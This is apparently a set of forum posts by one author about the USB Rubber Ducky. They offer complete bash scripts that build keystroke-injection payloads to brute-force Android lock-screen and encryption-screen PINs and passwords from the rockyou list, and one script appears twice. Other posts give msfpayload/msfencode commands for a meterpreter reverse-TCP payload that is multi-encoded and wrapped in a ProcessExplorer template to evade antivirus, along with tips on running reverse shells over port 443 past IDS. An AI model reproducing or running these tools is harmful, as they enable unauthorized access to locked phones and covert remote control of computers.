CaptainHooligan

Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity. #!/bin/bash # # Payload-Generator version 1.0 # This tool is licensed under the GPLv3. Currently maintained by # James Luther (CaptainHooligan) # # This tool is used to generate payloads for the USB Rubber Ducky # # ======================================================================== # Main Menu # ======================================================================== main () { dialog --backtitle "Ducky Payload Generator" --title "Main Menu" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Password "Brute Force Password" Pin "Brute Force Pin" About "Display About" Exit "Quit " 2>/tmp/menuitem.$$ menuitem=`cat /tmp/menuitem.$$` opt=$? case $menuitem in Pin) Pin;; Password) Password;; About) dialog --backtitle "Ducky Payload Generator" --title "About" --msgbox "\nThe Ducky Payload Generator is used to generate a number of payloads for the USB Rubber Ducky. As of right now it is just made to brute force Android passwords. Later pin brute forcing, reverse shell payloads, and whatever else we can think of will be added. Until then enjoy!\n\n Version: 1.0\n Licensed Under GPLv3\n Maintainted by CaptainHooligan" 15 70 && clear && main;; Exit) clear;; *) clear;; esac return } # ========================================================================== # This is where the Encryption Brute Forcer is Generated # ========================================================================== Pin () { dialog --backtitle "Ducky Payload Generator" --title "Pin Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Pin at Encryption Screen" Lock "Pin at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$ menuitem=`cat /tmp/menuitem.$$` opt=$? case $menuitem in Encryption) clear && echo "Generating Encryption Screen Pin Brute Forcer Payload ..." && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android_brute-force_encryption.txt && java -jar duckencode.jar -i android_brute-force_encryption.txt && mv inject.bin android_brute-force_encryption.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_encryption.*;; Lock) clear && echo "Generating Lock Screen Pin Brute Forcer Payload ... " && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_lock.txt && java -jar duckencode.jar -i android_brute-force_lock.txt && mv inject.bin android_brute-force_lock.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_lock.*;; Main) clear && main;; *) clear ;; esac return } # ========================================================================= # This is where the Password Brute Forcer Menu is processed. # ========================================================================= Password () { dialog --backtitle "Ducky Payload Generator" --title "Password Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Password at Encryption Screen" Lock "Password at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$ menuitem=`cat /tmp/menuitem.$$` opt=$? case $menuitem in Encryption) clear && Pword_Enc ;; Lock) clear && Pword_Lck ;; Main) clear && main ;; *) clear ;; esac return } # ========================================================================== # Password Encryption Screen Brute Forcer # ========================================================================== Pword_Enc () { echo "Generating Encryption Screen Password Brute Forcer ..." echo " " echo DELAY 5000 > android-pword-encryption.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android-pword-encryption.txt java -jar duckencode.jar -i android-pword-encryption.txt mv inject.bin android-pword-encryption.bin clear && ls -lart android-pword-encryption.* return } # ========================================================================== # Password Lock Screen Brute Forcer # ========================================================================== Pword_Lck () { echo "Generating Lock Screen Password Brute Forcer ..." echo " " echo DELAY 5000 > android-pword-lock.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android-pword-lock.txt java -jar duckencode.jar -i android-pword-lock.txt mv inject.bin android-pword-lock.bin clear && ls -lart android-pword-lock.* return } # ===================================================================== # Prerequisite Checker # ===================================================================== pre () { echo -e "Verifying prerequisites are installed ... " echo "" duckdir=`find / -name duckencode.jar` if [ -z "$duckdir" ] ; then echo "Duckencode.jar not found on system. Please verify you have this installed." exit 1 else echo "Duckencode.jar prerequisite met." fi duckinpath=`which duckencode.jar` if [ -z "$duckinpath" ] ; then PATH=$PATH:$duckdir fi bundir=`find / -name bzip2` if [ -z "$bundir" ] ; then echo "Bzip2 not found on system. Please verify you have this installed." exit 1 else echo "Bzip2 prerequisite met." fi buninpath=`which bzip2` if [ -z "$buninpath" ] ; then PATH=$PATH:$bundir fi wgetdir=`find / -name wget` if [ -z "$wgetdir" ] ; then echo "Wget not found on system. Please verify you have this installed." exit 1 else echo "Wget prerequisite met." fi wgetinpath=`which wget` if [ -z "$wgetinpath" ] ; then PATH=$PATH:$wgetdir fi echo "" echo "" echo -e "Verify connection to internet and press [Enter]." read echo "" echo "" echo -e "Downloading rockyou password list. This can take some time ..." echo "" echo "" wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 bunzip2 rockyou.txt.bz2 echo "" echo 1 > $HOME/.payloadgenerator echo "All Prerequisites met. To continue press [Enter]." read main return } # ========================================================================== # Actual program running # ========================================================================== clear echo " " WHOAMI=`id | sed -e 's/(.*//'` if [ "$WHOAMI" != "uid=0" ] ; then echo "Sorry, you need super user access to run this script." exit 1 fi echo " " echo "Checking to see if you've met prerequisites before ..." echo " " if [ -f /root/.payloadgenerator ] then check=`cat $HOME/.payloadgenerator` case $check in 1) main;; 0) pre;; *) pre;; esac else pre fi

Good call! As always the more research you do on a target the better prepared you can be.

Great share! Just as mentioned above, some AV solutions include a Host Based Security System (HBSS) which can whitelist hardware as well as software. In an environment that uses all Dell keyboards or just specific ones that do not use generic drivers this attack would be defeated.

That was pretty much the point I was trying to make, there is always a way to get around what security implementations you run into. The duck does appear as a HID which means what user limits we run into are what we have to deal with. If the security implementation has application white listing the download will not matter as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators. Either way, know the environment and plan accordingly as there is always a way when thinking outside the box.

It doesn't really matter what the limitations are set to users. There will always be some way to bypass security in one way or another. For example: robust firewall solution combined with application white listing, limited permissions and USB mass storage disabled means you aren't going to be able to download a file nor will you be able to bring one in.

This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc. Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here: https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing

Any easy thought is can these PC's access the internet behind the routers and firewall? If so just run a secure reverse shell over 443. Some IDS will look at the tcp stream and see the amount of traffic as anomalous but most will see encrypted traffic and ignore it.

Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen. #!/bin/bash clear echo -e "========================================================" echo -e " This script downloads the rockyou password list" echo -e " then takes the top 5000 passwords and generates" echo -e " an Android brute forcer." echo -e "========================================================" echo -e " You need to have duckencode.jar installed as well" echo -e " as bzip2 and wget." echo -e "========================================================" echo -e " This script is licensed under the GPLv3 and is" echo -e " currently maintained by James Luther (CaptainHooligan)" echo -e "========================================================" echo "" echo "" WHOAMI=`id | sed -e 's/(.*//'` if [ "$WHOAMI" != "uid=0" ] ; then echo "Sorry, you need super user access to run this script." exit 1 fi echo -e "Verifying prerequisites are installed ... " echo "" duckdir=`find / -name duckencode.jar` if [ -z "$duckdir" ] ; then echo "Duckencode.jar not found on system. Please verify you have this installed." exit 1 else echo "Duckencode.jar prerequisite met." fi duckinpath=`which duckencode.jar` if [ -z "$duckinpath" ] ; then PATH=$PATH:$duckdir fi bundir=`find / -name bzip2` if [ -z "$bundir" ] ; then echo "Bzip2 not found on system. Please verify you have this installed." exit 1 else echo "Bzip2 prerequisite met." fi buninpath=`which bzip2` if [ -z "$buninpath" ] ; then PATH=$PATH:$bundir fi wgetdir=`find / -name wget` if [ -z "$wgetdir" ] ; then echo "Wget not found on system. Please verify you have this installed." exit 1 else echo "Wget prerequisite met." fi wgetinpath=`which wget` if [ -z "$wgetinpath" ] ; then PATH=$PATH:$wgetdir fi echo "" echo "" #echo -e "Which do you want to attack?" #echo -e " 1. Encryption Screen" #echo -e " 2. Password Screen" #read answer #case answer # 1) echo -e "Verify connection to internet and press [Enter]." read echo "" echo "" echo -e "Downloading rockyou password list. This can take some time ..." echo "" echo "" wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 bunzip rockyou.txt.bz2 echo "" echo "" echo -e "Creating rock-android.txt file ... " echo "" echo "" echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt echo -e "rock-android.txt created!" ls -lart rock-android.txt echo "" echo "" echo -e "Creating inject.bin file ... " java -jar duckencode.jar -i rock-android.txt echo "" echo "" echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!" ls -lart inject.bin

Check out dSploit. It is an open source project similar to this.

I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe [/CODE] That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is: [CODE] wget http://download.sysinternals.com/Files/ProcessExplorer.zip unzip ProcessExplorer.zip msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5 [/CODE] As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV.

Why not just use msfencode?

Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. ** Edit ** Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen. #!/bin/bash clear echo -e "========================================================" echo -e " This script downloads the rockyou password list" echo -e " then takes the top 5000 passwords and generates" echo -e " an Android brute forcer." echo -e "========================================================" echo -e " You need to have duckencode.jar installed as well" echo -e " as bzip2 and wget." echo -e "========================================================" echo -e " This script is licensed under the GPLv3 and is" echo -e " currently maintained by James Luther (CaptainHooligan)" echo -e "========================================================" echo "" echo "" WHOAMI=`id | sed -e 's/(.*//'` if [ "$WHOAMI" != "uid=0" ] ; then echo "Sorry, you need super user access to run this script." exit 1 fi echo -e "Verifying prerequisites are installed ... " echo "" duckdir=`find / -name duckencode.jar` if [ -z "$duckdir" ] ; then echo "Duckencode.jar not found on system. Please verify you have this installed." exit 1 else echo "Duckencode.jar prerequisite met." fi duckinpath=`which duckencode.jar` if [ -z "$duckinpath" ] ; then PATH=$PATH:$duckdir fi bundir=`find / -name bzip2` if [ -z "$bundir" ] ; then echo "Bzip2 not found on system. Please verify you have this installed." exit 1 else echo "Bzip2 prerequisite met." fi buninpath=`which bzip2` if [ -z "$buninpath" ] ; then PATH=$PATH:$bundir fi wgetdir=`find / -name wget` if [ -z "$wgetdir" ] ; then echo "Wget not found on system. Please verify you have this installed." exit 1 else echo "Wget prerequisite met." fi wgetinpath=`which wget` if [ -z "$wgetinpath" ] ; then PATH=$PATH:$wgetdir fi echo "" echo "" #echo -e "Which do you want to attack?" #echo -e " 1. Encryption Screen" #echo -e " 2. Password Screen" #read answer #case answer # 1) echo -e "Verify connection to internet and press [Enter]." read echo "" echo "" echo -e "Downloading rockyou password list. This can take some time ..." echo "" echo "" wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 bunzip rockyou.txt.bz2 echo "" echo "" echo -e "Creating rock-android.txt file ... " echo "" echo "" echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt echo -e "rock-android.txt created!" ls -lart rock-android.txt echo "" echo "" echo -e "Creating inject.bin file ... " java -jar duckencode.jar -i rock-android.txt echo "" echo "" echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!" ls -lart inject.bin [/CODE]